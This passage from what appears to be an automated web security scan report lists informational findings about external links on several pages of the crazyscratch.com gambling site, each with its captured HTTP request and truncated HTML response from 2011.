http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /FairPlay.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.31. http://www.info.crazyscratch.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Help.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/Help.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Help/HelpContactUs_ENG.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /Help.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a href="ContactUsMail.aspx"><img border="0" alt="HelpContactUs" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Help/HelpContactUs_ENG.gif" /></a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.32. http://www.info.crazyscratch.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/InviteFriend.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/InviteFriend.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /InviteFriend.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.33. http://www.info.crazyscratch.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/PlayersClub.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/PlayersClub.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_header.gif
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_introduction_ENG.gif
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_meetteam_ENG.gif
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_shoutout_ENG.gif
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_whatAbout_ENG.gif
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Brands/General/WebSite/Club/Groupicture.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /PlayersClub.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<div class="StandardPageLeftSectionContentDiv">
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_header.gif" />
<br />
...[SNIP]...
<br />

<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_introduction_ENG.gif" />
<br />
...[SNIP]...
<br />
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_whatAbout_ENG.gif" />
<br />
...[SNIP]...
<br />
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_meetteam_ENG.gif" />
<br />
...[SNIP]...
<center>
<img alt="" src="http://download.neogames-tech.com/Brands/General/WebSite/Club/Groupicture.gif" border="0" width="295px" height="221px" />
</center>
...[SNIP]...
<div class="StandardPageLeftSectionContentDiv">
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_shoutout_ENG.gif" />
<br />
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.34. http://www.info.crazyscratch.com/Privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Privacy.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/Privacy.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /Privacy.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.35. http://www.info.crazyscratch.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Promotions.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/Promotions.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/5FreePromotion_ENG_GBP.jpg
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/WeeklySchedule_ENG.html
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_bottom_left.jpg
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_bottom_right.jpg
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_header.jpg
http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_midle_right.jpg
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /Promotions.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:46 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<br /><a href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/WeeklySchedule_ENG.html" target="_blank" >
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_header.jpg" /></a>
...[SNIP]...
real chance to win the Jackpot, you...ve come to the right place!
Check out our daily promotions to see what incredible offers, tournaments and prizes we...ve got in store for you!
<a class="PromotionPageLinks" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/WeeklySchedule_ENG.html" target="_blank">Click here to see our upcoming promotions</a>
...[SNIP]...
